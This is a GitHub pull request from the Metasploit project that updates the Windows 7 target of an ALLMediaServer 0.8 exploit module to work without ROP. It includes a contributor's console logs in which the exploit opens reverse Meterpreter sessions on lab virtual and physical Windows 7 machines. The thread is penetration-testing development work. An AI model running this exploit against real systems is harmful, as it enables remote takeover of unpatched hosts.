Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Target W7 updated according to #607 #608

Merged
merged 1 commit into from Jul 15, 2012
Merged

Target W7 updated according to #607 #608

merged 1 commit into from Jul 15, 2012

Conversation

jvazquez-r7
Copy link
Contributor

According to testing reflected on #607 the stack pivoting isn't stable on W7 between virtual and physical environments. So avoiding ROP exploit on W7 at the moment because W7 is OptIn and AllMediaServer runs without DEP by default.

@jvazquez-r7 jvazquez-r7 mentioned this pull request Jul 15, 2012
Merged
@modpr0be
Copy link
Contributor

Hi jvazquez,

I want to confirm the exploitation also working on my W7 VMware.

msf  exploit(allmediaserver_w7) > exploit 

[*] Started reverse handler on 10.10.10.2:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 10.10.10.12
[*] Meterpreter session 2 opened (10.10.10.2:4444 -> 10.10.10.12:1097) at 2012-07-15 23:40:31 +0700

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter > sysinfo
Computer        : LABWIN7-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

Now testing on physical machine.. sorry a bit slow, I don't have a high-end machine to work faster :D

@modpr0be
Copy link
Contributor

Confirm the exploit works on the physical machine running W7 SP1.


msf  exploit(allmediaserver_w7) > 
msf  exploit(allmediaserver_w7) > exploit 

[*] Started reverse handler on 10.10.10.2:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 10.10.10.7
[*] Meterpreter session 3 opened (10.10.10.2:4444 -> 10.10.10.7:1382) at 2012-07-16 00:44:35 +0700

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
meterpreter > sysinfo
Computer        : M1ABRAMS
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

The exploit works flawlessly on Windows XP3, no more test necessary.

@modpr0be
Copy link
Contributor

Hi jvazquez,

I think it's quite enough to let the Win7 SP1 exploit works without ROP, but the XP SP3 does.
Thanks you so much. I learned a lot :)

@wchen-r7 wchen-r7 merged commit 8cf08c6 into rapid7:master Jul 15, 2012
@jvazquez-r7
Copy link
Contributor Author

THANK you for your collaboration :) Great work!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jvazquez-r7 @modpr0be @wchen-r7